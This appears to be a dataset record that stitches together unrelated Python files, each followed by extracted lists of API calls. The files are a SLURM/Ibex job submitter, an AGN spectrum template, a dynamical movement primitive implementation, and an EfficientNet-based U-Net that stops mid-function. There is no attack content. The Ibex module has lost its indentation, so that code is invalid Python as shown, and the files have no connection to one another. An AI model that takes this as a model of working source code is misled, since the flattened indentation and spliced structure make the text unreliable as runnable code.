Module to run programs on ibex
"""
import numpy as np
import logging
from .executor import Executor
import re
from pathlib import Path
class RunError(Exception):
"""
    Exception raised for errors while preparing or submitting Ibex jobs.
"""
pass
class IbexRun(Executor):
"""
    Class to create jobs to run on Ibex. When the `run()` method is called,
    a shell script will be submitted to the cluster via the `sbatch` command.
    Methods to override:
    - `__init__`: set up your own inputs and the output directory for the jobs
      and the Ibex stdout.
    - `prepare`: create and save the script that will be submitted to sbatch.
      In this script you can run terminal commands directly, or call
      other Python scripts.
    A commented usage sketch follows the class definition below.
"""
def __init__(self, time_per_command:int, out_ibex:Path, ncommands:int=1,
jobname:str='IbexRun', partition:str='batch', ntasks:int=1,
cpus_per_task:int=1, mem_per_cpu:int=2, max_jobs:int=1990, **kw):
"""
Define variables for the ibex job
Args:
time_per_command (int):
Time that each individual command takes to run.
out_ibex (Path):
Directory to save output from ibex stdout
ncommands (int, optional):
                Number of total commands to be run, which will later be
                distributed over at most `max_jobs` jobs in a job array.
Defaults to 1.
jobname (str, optional):
Name of the job to be submitted. It will show in the ibex queue.
Defaults to 'IbexRun'.
partition (str, optional):
Partition to run the job in ibex. Defaults to 'batch'.
ntasks (int, optional):
Number of tasks for the ibex job array. In most cases you will
leave it as is. Defaults to 1.
cpus_per_task (int, optional):
Number of CPUs to be used per task. Defaults to 1.
mem_per_cpu (int, optional):
GBs of memory per CPU to request. Defaults to 2.
"""
self.time_per_command = time_per_command
self.jobname = jobname
self.partition = partition
self.out_ibex = out_ibex
self.ntasks = ntasks
self.cpus_per_task = cpus_per_task
self.mem_per_cpu = mem_per_cpu
self.ncommands=ncommands
self.max_jobs = max_jobs
self.commands_per_job = int(np.ceil( self.ncommands / self.max_jobs ))
self.njobs = int(np.ceil( self.ncommands / self.commands_per_job ))
self.time_per_job = self.time_str(self.commands_per_job,
self.time_per_command)
self.script_file = out_ibex / 'script.sh'
self.args = f'sbatch {self.script_file}'.split()
super().__init__(self.args, **kw)
@staticmethod
def time_str(commands_per_job:int, t_per_command:int) -> str:
"""
Get the time of the job in the format hh:mm:ss according to the number
of commands to run
Args:
commands_per_job (int): Number of commands to run per job in the array
t_per_command (int): Time in minutes to run each command
Returns:
str: Time to request for each job in the array in hh:mm:ss format
"""
total_minutes = commands_per_job * t_per_command
hours = np.floor(total_minutes/60)
minutes = np.ceil(total_minutes % 60)
return f'{int(hours):02}:{int(minutes):02}:00'
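        # Worked example: 5 commands per job at 50 min each -> 250 minutes,
        # hours = floor(250 / 60) = 4 and minutes = ceil(250 % 60) = 10,
        # so the requested job time is '04:10:00'.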
def prepare(self):
"""
Make the script to be run in sbatch.
This method will be overwritten in your own class, to make the script
specific to the command that you wish to run.
"""
if not self.out_ibex.exists():
self.out_ibex.mkdir(parents=True)
self.script = (
# This part will stay the same:
"#!/bin/bash\n"
f"#SBATCH --job-name={self.jobname}\n"
f"#SBATCH --partition={self.partition}\n"
f"#SBATCH --output={self.out_ibex}/%J.out\n"
f"#SBATCH --time={self.time_per_job}\n"
f"#SBATCH --ntasks={self.ntasks}\n"
f"#SBATCH --cpus-per-task={self.cpus_per_task}\n"
f"#SBATCH --mem-per-cpu={self.mem_per_cpu}G\n"
f"#SBATCH --array=0-{self.njobs-1}\n"
"\n"
# This part will be overwritten:
"echo 'Hello world!'\n"
# Example using the SLURM_ARRAY_TASK_ID variable
# "seq_file='sequences_${SLURM_ARRAY_TASK_ID}.fasta'\n"
# "python script.py ${seq_file}\n"
)
logging.info(f'Script to be submitted:\n{self.script}')
with open(self.script_file, 'w') as f:
f.write(self.script)
def finish(self) -> str:
"""
Returns the job id if the submission to sbatch was successful.
"""
return re.search(r'\d+', self.completed_process.stdout).group()
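# A minimal subclassing sketch (the inputs, the command run inside `prepare`
# and the output directory are hypothetical, not part of this module):
#
#   class MyRun(IbexRun):
#       def __init__(self, inputs, out_ibex: Path, **kw):
#           self.inputs = inputs
#           super().__init__(time_per_command=30, out_ibex=out_ibex,
#                            ncommands=len(inputs), jobname='MyRun', **kw)
#
#       def prepare(self):
#           super().prepare()
#           # ...then rebuild self.script so that its body runs the real
#           # command, e.g. "python my_script.py ${SLURM_ARRAY_TASK_ID}",
#           # and write it to self.script_file.
#
#   job = MyRun(['a.in', 'b.in'], Path('out_ibex'))
#   job.prepare()
#   job.run()   # submits the script via `sbatch` (self.args set in __init__)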
|
[
"logging.info",
"numpy.floor",
"re.search",
"numpy.ceil"
] |
[((3405, 3433), 'numpy.floor', 'np.floor', (['(total_minutes / 60)'], {}), '(total_minutes / 60)\n', (3413, 3433), True, 'import numpy as np\n'), ((3450, 3477), 'numpy.ceil', 'np.ceil', (['(total_minutes % 60)'], {}), '(total_minutes % 60)\n', (3457, 3477), True, 'import numpy as np\n'), ((4668, 4726), 'logging.info', 'logging.info', (['f"""Script to be submitted:\n{self.script}"""'], {}), '(f"""Script to be submitted:\n{self.script}""")\n', (4680, 4726), False, 'import logging\n'), ((2481, 2520), 'numpy.ceil', 'np.ceil', (['(self.ncommands / self.max_jobs)'], {}), '(self.ncommands / self.max_jobs)\n', (2488, 2520), True, 'import numpy as np\n'), ((2549, 2596), 'numpy.ceil', 'np.ceil', (['(self.ncommands / self.commands_per_job)'], {}), '(self.ncommands / self.commands_per_job)\n', (2556, 2596), True, 'import numpy as np\n'), ((4946, 4994), 're.search', 're.search', (['"""\\\\d+"""', 'self.completed_process.stdout'], {}), "('\\\\d+', self.completed_process.stdout)\n", (4955, 4994), False, 'import re\n')]
|
"""
Sazonov, S. Yu., Ostriker, J. P., & Sunyaev, R. A. 2004, MNRAS, 347, 144
"""
import numpy as np
# Parameters for the Sazonov & Ostriker AGN template
_Alpha = 0.24
_Beta = 1.60
_Gamma = 1.06
_E_1 = 83e3
_K = 0.0041
_E_0 = (_Beta - _Alpha) * _E_1
_A = np.exp(2e3 / _E_1) * 2e3**_Alpha
_B = ((_E_0**(_Beta - _Alpha)) \
* np.exp(-(_Beta - _Alpha))) / \
(1.0 + (_K * _E_0**(_Beta - _Gamma)))
# Normalization constants to make the SOS04 spectrum continuous.
_SX_Normalization = 1.0
_UV_Normalization = _SX_Normalization * ((_A * 2e3**-_Alpha) * \
np.exp(-2e3 / _E_1)) / ((1.2 * 2e3**-1.7) * np.exp(2000.0 / 2000.))
_IR_Normalization = _UV_Normalization * ((1.2 * 10**-1.7) \
* np.exp(10.0 / 2e3)) / (1.2 * 159 * 10**-0.6)
_HX_Normalization = _SX_Normalization * (_A * _E_0**-_Alpha * \
np.exp(-_E_0 / _E_1)) / (_A * _B * (1.0 + _K * _E_0**(_Beta - _Gamma)) * \
_E_0**-_Beta)
def Spectrum(E, t=0.0, **kwargs):
"""
Broadband quasar template spectrum.
References
----------
    Sazonov, S. Yu., Ostriker, J. P., & Sunyaev, R. A. 2004, MNRAS, 347, 144.
"""
op = (E < 10)
uv = (E >= 10) & (E < 2e3)
xs = (E >= 2e3) & (E < _E_0)
xh = (E >= _E_0) & (E < 4e5)
if type(E) in [int, float]:
if op:
F = _IR_Normalization * 1.2 * 159 * E**-0.6
elif uv:
F = _UV_Normalization * 1.2 * E**-1.7 * np.exp(E / 2000.0)
elif xs:
F = _SX_Normalization * _A * E**-_Alpha * np.exp(-E / _E_1)
elif xh:
F = _HX_Normalization * _A * _B * (1.0 + _K * \
E**(_Beta - _Gamma)) * E**-_Beta
else:
F = 0
else:
F = np.zeros_like(E)
F += op * _IR_Normalization * 1.2 * 159 * E**-0.6
F += uv * _UV_Normalization * 1.2 * E**-1.7 * np.exp(E / 2000.0)
F += xs * _SX_Normalization * _A * E**-_Alpha * np.exp(-E / _E_1)
F += xh * _HX_Normalization * _A * _B * (1.0 + _K * \
E**(_Beta - _Gamma)) * E**-_Beta
return E * F
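# A minimal usage sketch (the energy grid below is illustrative and spans the
# template's IR/UV/soft-X-ray/hard-X-ray branches):
#
#   E = np.logspace(0, 5, 200)
#   EF_E = Spectrum(E)   # returns E * F(E) for the broadband template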
|
[
"numpy.zeros_like",
"numpy.exp"
] |
[((233, 254), 'numpy.exp', 'np.exp', (['(2000.0 / _E_1)'], {}), '(2000.0 / _E_1)\n', (239, 254), True, 'import numpy as np\n'), ((305, 330), 'numpy.exp', 'np.exp', (['(-(_Beta - _Alpha))'], {}), '(-(_Beta - _Alpha))\n', (311, 330), True, 'import numpy as np\n'), ((585, 608), 'numpy.exp', 'np.exp', (['(2000.0 / 2000.0)'], {}), '(2000.0 / 2000.0)\n', (591, 608), True, 'import numpy as np\n'), ((1674, 1690), 'numpy.zeros_like', 'np.zeros_like', (['E'], {}), '(E)\n', (1687, 1690), True, 'import numpy as np\n'), ((541, 563), 'numpy.exp', 'np.exp', (['(-2000.0 / _E_1)'], {}), '(-2000.0 / _E_1)\n', (547, 563), True, 'import numpy as np\n'), ((675, 696), 'numpy.exp', 'np.exp', (['(10.0 / 2000.0)'], {}), '(10.0 / 2000.0)\n', (681, 696), True, 'import numpy as np\n'), ((788, 808), 'numpy.exp', 'np.exp', (['(-_E_0 / _E_1)'], {}), '(-_E_0 / _E_1)\n', (794, 808), True, 'import numpy as np\n'), ((1803, 1821), 'numpy.exp', 'np.exp', (['(E / 2000.0)'], {}), '(E / 2000.0)\n', (1809, 1821), True, 'import numpy as np\n'), ((1878, 1895), 'numpy.exp', 'np.exp', (['(-E / _E_1)'], {}), '(-E / _E_1)\n', (1884, 1895), True, 'import numpy as np\n'), ((1364, 1382), 'numpy.exp', 'np.exp', (['(E / 2000.0)'], {}), '(E / 2000.0)\n', (1370, 1382), True, 'import numpy as np\n'), ((1454, 1471), 'numpy.exp', 'np.exp', (['(-E / _E_1)'], {}), '(-E / _E_1)\n', (1460, 1471), True, 'import numpy as np\n')]
|
import numpy as np
from ._base import DMPBase, WeightParametersMixin
from ._forcing_term import ForcingTerm
from ._canonical_system import canonical_system_alpha
from ._dmp import dmp_imitate, dmp_open_loop
class DMPWithFinalVelocity(WeightParametersMixin, DMPBase):
"""Dynamical movement primitive (DMP) with final velocity.
Implementation according to
    K. Muelling, J. Kober, O. Kroemer, J. Peters:
Learning to Select and Generalize Striking Movements in Robot Table Tennis
(2013), International Journal of Robotics Research 32(3), pp. 263-279,
https://www.ias.informatik.tu-darmstadt.de/uploads/Publications/Muelling_IJRR_2013.pdf
Parameters
----------
n_dims : int
State space dimensions.
execution_time : float
Execution time of the DMP.
dt : float, optional (default: 0.01)
Time difference between DMP steps.
n_weights_per_dim : int, optional (default: 10)
Number of weights of the function approximator per dimension.
int_dt : float, optional (default: 0.001)
Time difference for Euler integration.
p_gain : float, optional (default: 0)
Gain for proportional controller of DMP tracking error.
The domain is [0, execution_time**2/dt].
Attributes
----------
dt_ : float
Time difference between DMP steps. This value can be changed to adapt
the frequency.
"""
def __init__(self, n_dims, execution_time, dt=0.01, n_weights_per_dim=10,
int_dt=0.001, p_gain=0.0):
super(DMPWithFinalVelocity, self).__init__(n_dims, n_dims)
self.execution_time = execution_time
self.dt_ = dt
self.n_weights_per_dim = n_weights_per_dim
self.int_dt = int_dt
self.p_gain = p_gain
alpha_z = canonical_system_alpha(0.01, self.execution_time, 0.0,
self.int_dt)
self.forcing_term = ForcingTerm(self.n_dims, self.n_weights_per_dim,
self.execution_time, 0.0, 0.8, alpha_z)
self.alpha_y = 25.0
self.beta_y = self.alpha_y / 4.0
def step(self, last_y, last_yd, coupling_term=None):
"""DMP step.
Parameters
----------
last_y : array, shape (n_dims,)
Last state.
last_yd : array, shape (n_dims,)
Last time derivative of state (e.g., velocity).
coupling_term : object, optional (default: None)
Coupling term that will be added to velocity.
Returns
-------
y : array, shape (n_dims,)
Next state.
yd : array, shape (n_dims,)
Next time derivative of state (e.g., velocity).
"""
self.last_t = self.t
self.t += self.dt_
if not self.initialized:
self.current_y = np.copy(self.start_y)
self.current_yd = np.copy(self.start_yd)
self.initialized = True
# https://github.com/studywolf/pydmps/blob/master/pydmps/cs.py
tracking_error = self.current_y - last_y
dmp_step_euler_with_constraints(
self.last_t, self.t,
self.current_y, self.current_yd,
self.goal_y, self.goal_yd, self.goal_ydd,
self.start_y, self.start_yd, self.start_ydd,
self.execution_time, 0.0,
self.alpha_y, self.beta_y,
self.forcing_term,
coupling_term=coupling_term,
int_dt=self.int_dt,
p_gain=self.p_gain,
tracking_error=tracking_error)
return np.copy(self.current_y), np.copy(self.current_yd)
def open_loop(self, run_t=None, coupling_term=None):
"""Run DMP open loop.
Parameters
----------
run_t : float, optional (default: execution_time)
Run time of DMP. Can be shorter or longer than execution_time.
coupling_term : object, optional (default: None)
Coupling term that will be added to velocity.
Returns
-------
T : array, shape (n_steps,)
Time for each step.
Y : array, shape (n_steps, n_dims)
State at each step.
"""
return dmp_open_loop(
self.execution_time, 0.0, self.dt_,
self.start_y, self.goal_y,
self.alpha_y, self.beta_y,
self.forcing_term,
coupling_term,
run_t, self.int_dt,
dmp_step_euler_with_constraints,
start_yd=self.start_yd, start_ydd=self.start_ydd,
goal_yd=self.goal_yd, goal_ydd=self.goal_ydd)
def imitate(self, T, Y, regularization_coefficient=0.0):
"""Imitate demonstration.
Parameters
----------
T : array, shape (n_steps,)
Time for each step.
Y : array, shape (n_steps, n_dims)
State at each step.
regularization_coefficient : float, optional (default: 0)
Regularization coefficient for regression.
"""
self.forcing_term.weights[:, :], start_y, start_yd, start_ydd, goal_y, goal_yd, goal_ydd = dmp_imitate(
T, Y,
n_weights_per_dim=self.n_weights_per_dim,
regularization_coefficient=regularization_coefficient,
alpha_y=self.alpha_y, beta_y=self.beta_y,
overlap=self.forcing_term.overlap,
alpha_z=self.forcing_term.alpha_z, allow_final_velocity=True,
determine_forces=determine_forces)
self.configure(
start_y=start_y, start_yd=start_yd, start_ydd=start_ydd,
goal_y=goal_y, goal_yd=goal_yd, goal_ydd=goal_ydd)
def solve_constraints(t0, t1, y0, y0d, y0dd, y1, y1d, y1dd):
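    """Fit, per dimension, a quintic polynomial whose position, velocity and
    acceleration match (y0, y0d, y0dd) at t0 and (y1, y1d, y1dd) at t1.
    The rows of M below are the polynomial and its first two derivatives
    evaluated at t0 and t1; the returned B holds the six coefficients for
    each dimension (one column per dimension).
    """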
t02 = t0 * t0
t03 = t02 * t0
t04 = t03 * t0
t05 = t04 * t0
t12 = t1 * t1
t13 = t12 * t1
t14 = t13 * t1
t15 = t14 * t1
M = np.array([[1, t0, t02, t03, t04, t05],
[0, 1, 2 * t0, 3 * t02, 4 * t03, 5 * t04],
[0, 0, 2, 6 * t0, 12 * t02, 20 * t03],
[1, t1, t12, t13, t14, t15],
[0, 1, 2 * t1, 3 * t12, 4 * t13, 5 * t14],
[0, 0, 2, 6 * t1, 12 * t12, 20 * t13]])
Y = np.vstack((y0, y0d, y0dd, y1, y1d, y1dd))
# Solve M*b = y for b in each DOF at once
B = np.linalg.solve(M, Y)
return B
def apply_constraints(t, goal_y, goal_t, coefficients):
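    """Evaluate the quintic from solve_constraints (and its first two
    derivatives) at time t, giving the constrained goal position, velocity
    and acceleration; beyond goal_t the goal position is held with zero
    velocity and acceleration."""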
if t > goal_t + np.finfo(float).eps:
# For t > goal_t the polynomial should always 'pull' to the goal
# position, but velocity and acceleration should be zero.
# This is done to avoid diverging from the goal if the DMP is executed
# longer than expected.
return goal_y, np.zeros_like(goal_y), np.zeros_like(goal_y)
else:
t2 = t * t
t3 = t2 * t
t4 = t3 * t
t5 = t4 * t
pos = np.array([1, t, t2, t3, t4, t5])
vel = np.array([0, 1, 2 * t, 3 * t2, 4 * t3, 5 * t4])
acc = np.array([0, 0, 2, 6 * t, 12 * t2, 20 * t3])
g = np.dot(pos, coefficients)
gd = np.dot(vel, coefficients)
gdd = np.dot(acc, coefficients)
return g, gd, gdd
def determine_forces(T, Y, alpha_y, beta_y, allow_final_velocity):
"""Determine forces that the forcing term should generate.
Parameters
----------
T : array, shape (n_steps,)
Time of each step.
Y : array, shape (n_steps, n_dims)
Position at each step.
alpha_y : float
Parameter of the transformation system.
beta_y : float
Parameter of the transformation system.
allow_final_velocity : bool
Whether a final velocity is allowed. This should always be True for
this function.
Returns
-------
F : array, shape (n_steps, n_dims)
Forces.
start_y : array, shape (n_dims,)
Start position.
start_yd : array, shape (n_dims,)
Start velocity.
start_ydd : array, shape (n_dims,)
Start acceleration.
goal_y : array, shape (n_dims,)
Final position.
goal_yd : array, shape (n_dims,)
Final velocity.
goal_ydd : array, shape (n_dims,)
Final acceleration.
"""
assert allow_final_velocity
n_dims = Y.shape[1]
DT = np.diff(T)
Yd = np.empty_like(Y)
Yd[0] = 0.0
for d in range(n_dims):
Yd[1:, d] = np.diff(Y[:, d]) / DT
Ydd = np.empty_like(Y)
Ydd[0] = 0.0
for d in range(n_dims):
Ydd[1:, d] = np.diff(Yd[:, d]) / DT
coefficients = solve_constraints(
T[0], T[-1], Y[0], Yd[0], Ydd[0], Y[-1], Yd[-1], Ydd[-1])
execution_time = T[-1] - T[0]
F = np.empty((len(T), n_dims))
for i in range(len(T)):
g, gd, gdd = apply_constraints(T[i], Y[-1], T[-1], coefficients)
F[i, :] = execution_time ** 2 * Ydd[i] - alpha_y * (
beta_y * (g - Y[i]) + gd * execution_time
- Yd[i] * execution_time) - execution_time ** 2 * gdd
return F, Y[0], Yd[0], Ydd[0], Y[-1], Yd[-1], Ydd[-1]
def dmp_step_euler_with_constraints(
last_t, t, current_y, current_yd, goal_y, goal_yd, goal_ydd,
start_y, start_yd, start_ydd, goal_t, start_t, alpha_y, beta_y,
forcing_term, coupling_term=None, coupling_term_precomputed=None,
int_dt=0.001, p_gain=0.0, tracking_error=0.0):
"""Integrate regular DMP for one step with Euler integration.
Parameters
----------
last_t : float
Time at last step.
t : float
Time at current step.
current_y : array, shape (n_dims,)
Current position. Will be modified.
current_yd : array, shape (n_dims,)
Current velocity. Will be modified.
goal_y : array, shape (n_dims,)
Goal position.
goal_yd : array, shape (n_dims,)
Goal velocity.
goal_ydd : array, shape (n_dims,)
Goal acceleration.
start_y : array, shape (n_dims,)
Start position.
start_yd : array, shape (n_dims,)
Start velocity.
start_ydd : array, shape (n_dims,)
Start acceleration.
goal_t : float
Time at the end.
start_t : float
Time at the start.
alpha_y : float
Constant in transformation system.
beta_y : float
Constant in transformation system.
forcing_term : ForcingTerm
Forcing term.
coupling_term : CouplingTerm, optional (default: None)
Coupling term. Must have a function coupling(y, yd) that returns
additional velocity and acceleration.
coupling_term_precomputed : tuple
A precomputed coupling term, i.e., additional velocity and
acceleration.
int_dt : float, optional (default: 0.001)
Time delta used internally for integration.
p_gain : float, optional (default: 0)
Proportional gain for tracking error.
tracking_error : float, optional (default: 0)
Tracking error from last step.
"""
if start_t >= goal_t:
raise ValueError("Goal must be chronologically after start!")
if t <= start_t:
return np.copy(start_y), np.copy(start_yd), np.copy(start_ydd)
execution_time = goal_t - start_t
coefficients = solve_constraints(
start_t, goal_t, start_y, start_yd, start_ydd,
goal_y, goal_yd, goal_ydd)
current_t = last_t
while current_t < t:
dt = int_dt
if t - current_t < int_dt:
dt = t - current_t
current_t += dt
if coupling_term is not None:
cd, cdd = coupling_term.coupling(current_y, current_yd)
else:
cd, cdd = np.zeros_like(current_y), np.zeros_like(current_y)
if coupling_term_precomputed is not None:
cd += coupling_term_precomputed[0]
cdd += coupling_term_precomputed[1]
f = forcing_term(current_t).squeeze()
g, gd, gdd = apply_constraints(current_t, goal_y, goal_t, coefficients)
coupling_sum = cdd + p_gain * tracking_error / dt
ydd = (alpha_y * (beta_y * (g - current_y)
+ execution_time * gd
- execution_time * current_yd)
+ gdd * execution_time ** 2
+ f + coupling_sum) / execution_time ** 2
current_yd += dt * ydd + cd / execution_time
current_y += dt * current_yd
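# A minimal usage sketch (the 1-D demonstration below is made up; its nonzero
# final velocity is what this DMP variant is able to reproduce):
#
#   T = np.linspace(0.0, 1.0, 101)
#   Y = (T ** 2)[:, np.newaxis]                  # shape (n_steps, n_dims)
#   dmp = DMPWithFinalVelocity(n_dims=1, execution_time=1.0)
#   dmp.imitate(T, Y)
#   T_replay, Y_replay = dmp.open_loop()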
|
[
"numpy.zeros_like",
"numpy.copy",
"numpy.empty_like",
"numpy.finfo",
"numpy.diff",
"numpy.array",
"numpy.dot",
"numpy.linalg.solve",
"numpy.vstack"
] |
[((5868, 6113), 'numpy.array', 'np.array', (['[[1, t0, t02, t03, t04, t05], [0, 1, 2 * t0, 3 * t02, 4 * t03, 5 * t04], [0,\n 0, 2, 6 * t0, 12 * t02, 20 * t03], [1, t1, t12, t13, t14, t15], [0, 1, \n 2 * t1, 3 * t12, 4 * t13, 5 * t14], [0, 0, 2, 6 * t1, 12 * t12, 20 * t13]]'], {}), '([[1, t0, t02, t03, t04, t05], [0, 1, 2 * t0, 3 * t02, 4 * t03, 5 *\n t04], [0, 0, 2, 6 * t0, 12 * t02, 20 * t03], [1, t1, t12, t13, t14, t15\n ], [0, 1, 2 * t1, 3 * t12, 4 * t13, 5 * t14], [0, 0, 2, 6 * t1, 12 *\n t12, 20 * t13]])\n', (5876, 6113), True, 'import numpy as np\n'), ((6199, 6240), 'numpy.vstack', 'np.vstack', (['(y0, y0d, y0dd, y1, y1d, y1dd)'], {}), '((y0, y0d, y0dd, y1, y1d, y1dd))\n', (6208, 6240), True, 'import numpy as np\n'), ((6296, 6317), 'numpy.linalg.solve', 'np.linalg.solve', (['M', 'Y'], {}), '(M, Y)\n', (6311, 6317), True, 'import numpy as np\n'), ((8248, 8258), 'numpy.diff', 'np.diff', (['T'], {}), '(T)\n', (8255, 8258), True, 'import numpy as np\n'), ((8269, 8285), 'numpy.empty_like', 'np.empty_like', (['Y'], {}), '(Y)\n', (8282, 8285), True, 'import numpy as np\n'), ((8383, 8399), 'numpy.empty_like', 'np.empty_like', (['Y'], {}), '(Y)\n', (8396, 8399), True, 'import numpy as np\n'), ((6851, 6883), 'numpy.array', 'np.array', (['[1, t, t2, t3, t4, t5]'], {}), '([1, t, t2, t3, t4, t5])\n', (6859, 6883), True, 'import numpy as np\n'), ((6898, 6945), 'numpy.array', 'np.array', (['[0, 1, 2 * t, 3 * t2, 4 * t3, 5 * t4]'], {}), '([0, 1, 2 * t, 3 * t2, 4 * t3, 5 * t4])\n', (6906, 6945), True, 'import numpy as np\n'), ((6960, 7004), 'numpy.array', 'np.array', (['[0, 0, 2, 6 * t, 12 * t2, 20 * t3]'], {}), '([0, 0, 2, 6 * t, 12 * t2, 20 * t3])\n', (6968, 7004), True, 'import numpy as np\n'), ((7018, 7043), 'numpy.dot', 'np.dot', (['pos', 'coefficients'], {}), '(pos, coefficients)\n', (7024, 7043), True, 'import numpy as np\n'), ((7057, 7082), 'numpy.dot', 'np.dot', (['vel', 'coefficients'], {}), '(vel, coefficients)\n', (7063, 7082), True, 'import numpy as np\n'), ((7097, 7122), 'numpy.dot', 'np.dot', (['acc', 'coefficients'], {}), '(acc, coefficients)\n', (7103, 7122), True, 'import numpy as np\n'), ((2844, 2865), 'numpy.copy', 'np.copy', (['self.start_y'], {}), '(self.start_y)\n', (2851, 2865), True, 'import numpy as np\n'), ((2896, 2918), 'numpy.copy', 'np.copy', (['self.start_yd'], {}), '(self.start_yd)\n', (2903, 2918), True, 'import numpy as np\n'), ((3578, 3601), 'numpy.copy', 'np.copy', (['self.current_y'], {}), '(self.current_y)\n', (3585, 3601), True, 'import numpy as np\n'), ((3603, 3627), 'numpy.copy', 'np.copy', (['self.current_yd'], {}), '(self.current_yd)\n', (3610, 3627), True, 'import numpy as np\n'), ((6703, 6724), 'numpy.zeros_like', 'np.zeros_like', (['goal_y'], {}), '(goal_y)\n', (6716, 6724), True, 'import numpy as np\n'), ((6726, 6747), 'numpy.zeros_like', 'np.zeros_like', (['goal_y'], {}), '(goal_y)\n', (6739, 6747), True, 'import numpy as np\n'), ((8350, 8366), 'numpy.diff', 'np.diff', (['Y[:, d]'], {}), '(Y[:, d])\n', (8357, 8366), True, 'import numpy as np\n'), ((8466, 8483), 'numpy.diff', 'np.diff', (['Yd[:, d]'], {}), '(Yd[:, d])\n', (8473, 8483), True, 'import numpy as np\n'), ((11050, 11066), 'numpy.copy', 'np.copy', (['start_y'], {}), '(start_y)\n', (11057, 11066), True, 'import numpy as np\n'), ((11068, 11085), 'numpy.copy', 'np.copy', (['start_yd'], {}), '(start_yd)\n', (11075, 11085), True, 'import numpy as np\n'), ((11087, 11105), 'numpy.copy', 'np.copy', (['start_ydd'], {}), '(start_ydd)\n', (11094, 11105), True, 'import numpy as np\n'), ((6409, 6424), 
'numpy.finfo', 'np.finfo', (['float'], {}), '(float)\n', (6417, 6424), True, 'import numpy as np\n'), ((11576, 11600), 'numpy.zeros_like', 'np.zeros_like', (['current_y'], {}), '(current_y)\n', (11589, 11600), True, 'import numpy as np\n'), ((11602, 11626), 'numpy.zeros_like', 'np.zeros_like', (['current_y'], {}), '(current_y)\n', (11615, 11626), True, 'import numpy as np\n')]
|
## https://www.kaggle.com/meaninglesslives/nested-unet-with-efficientnet-encoder
import tensorflow as tf
from tensorflow import keras
#from efficientnet import EfficientNetB4
from efficientnet.tfkeras import EfficientNetB4
import numpy as np
def convolution_block(x, filters, size, strides=(1,1), padding='same', activation=True):
x = keras.layers.Conv2D(filters, size, strides=strides, padding=padding)(x)
x = keras.layers.BatchNormalization()(x)
    if activation:
x = keras.layers.LeakyReLU(alpha=0.1)(x)
return x
def residual_block(blockInput, num_filters=16):
x = keras.layers.LeakyReLU(alpha=0.1)(blockInput)
x = keras.layers.BatchNormalization()(x)
blockInput = keras.layers.BatchNormalization()(blockInput)
x = convolution_block(x, num_filters, (3,3) )
x = convolution_block(x, num_filters, (3,3), activation=False)
x = keras.layers.Add()([x, blockInput])
return x
def UEfficientNetB4(input_shape=(256, 256, 3), dropout_rate=0.5,imagenet_weights='imagenet'):
backbone = EfficientNetB4(weights=imagenet_weights,include_top=False,input_shape=input_shape)
input = backbone.input
start_neurons = 8
conv4 = backbone.layers[342].output
conv4 = keras.layers.LeakyReLU(alpha=0.1)(conv4)
pool4 = keras.layers.MaxPooling2D((2, 2))(conv4)
pool4 = keras.layers.Dropout(dropout_rate)(pool4)
# Middle
convm = keras.layers.Conv2D(start_neurons * 32, (3, 3), activation=None, padding="same", name='conv_middle')(pool4)
convm = residual_block(convm, start_neurons * 32)
convm = residual_block(convm, start_neurons * 32)
convm = keras.layers.LeakyReLU(alpha=0.1)(convm)
deconv4 = keras.layers.Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding="same")(convm)
deconv4_up1 = keras.layers.Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding="same")(deconv4)
deconv4_up2 = keras.layers.Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding="same")(deconv4_up1)
deconv4_up3 = keras.layers.Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding="same")(deconv4_up2)
uconv4 = keras.layers.concatenate([deconv4, conv4])
uconv4 = keras.layers.Dropout(dropout_rate)(uconv4)
uconv4 = keras.layers.Conv2D(start_neurons * 16, (3, 3), activation=None, padding="same")(uconv4)
uconv4 = residual_block(uconv4, start_neurons * 16)
# uconv4 = residual_block(uconv4,start_neurons * 16)
uconv4 = keras.layers.LeakyReLU(alpha=0.1)(uconv4) # conv1_2
deconv3 = keras.layers.Conv2DTranspose(start_neurons * 8, (3, 3), strides=(2, 2), padding="same")(uconv4)
deconv3_up1 = keras.layers.Conv2DTranspose(start_neurons * 8, (3, 3), strides=(2, 2), padding="same")(deconv3)
deconv3_up2 = keras.layers.Conv2DTranspose(start_neurons * 8, (3, 3), strides=(2, 2), padding="same")(deconv3_up1)
conv3 = backbone.layers[154].output
uconv3 = keras.layers.concatenate([deconv3, deconv4_up1, conv3])
uconv3 = keras.layers.Dropout(dropout_rate)(uconv3)
uconv3 = keras.layers.Conv2D(start_neurons * 8, (3, 3), activation=None, padding="same")(uconv3)
uconv3 = residual_block(uconv3, start_neurons * 8)
# uconv3 = residual_block(uconv3,start_neurons * 8)
uconv3 = keras.layers.LeakyReLU(alpha=0.1)(uconv3)
deconv2 = keras.layers.Conv2DTranspose(start_neurons * 4, (3, 3), strides=(2, 2), padding="same")(uconv3)
deconv2_up1 = keras.layers.Conv2DTranspose(start_neurons * 4, (3, 3), strides=(2, 2), padding="same")(deconv2)
conv2 = backbone.layers[89].output #92=>89
uconv2 = keras.layers.concatenate([deconv2, deconv3_up1, deconv4_up2, conv2])
uconv2 = keras.layers.Dropout(0.1)(uconv2)
uconv2 = keras.layers.Conv2D(start_neurons * 4, (3, 3), activation=None, padding="same")(uconv2)
uconv2 = residual_block(uconv2, start_neurons * 4)
# uconv2 = residual_block(uconv2,start_neurons * 4)
uconv2 = keras.layers.LeakyReLU(alpha=0.1)(uconv2)
deconv1 = keras.layers.Conv2DTranspose(start_neurons * 2, (3, 3), strides=(2, 2), padding="same")(uconv2)
conv1 = backbone.layers[30].output
uconv1 = keras.layers.concatenate([deconv1, deconv2_up1, deconv3_up2, deconv4_up3, conv1])
uconv1 = keras.layers.Dropout(0.1)(uconv1)
uconv1 = keras.layers.Conv2D(start_neurons * 2, (3, 3), activation=None, padding="same")(uconv1)
uconv1 = residual_block(uconv1, start_neurons * 2)
# uconv1 = residual_block(uconv1,start_neurons * 2)
uconv1 = keras.layers.LeakyReLU(alpha=0.1)(uconv1)
uconv0 = keras.layers.Conv2DTranspose(start_neurons * 1, (3, 3), strides=(2, 2), padding="same")(uconv1)
uconv0 = keras.layers.Dropout(0.1)(uconv0)
uconv0 = keras.layers.Conv2D(start_neurons * 1, (3, 3), activation=None, padding="same")(uconv0)
uconv0 = residual_block(uconv0, start_neurons * 1)
# uconv0 = residual_block(uconv0,start_neurons * 1)
uconv0 = keras.layers.LeakyReLU(alpha=0.1)(uconv0)
uconv0 = keras.layers.Dropout(dropout_rate / 2)(uconv0)
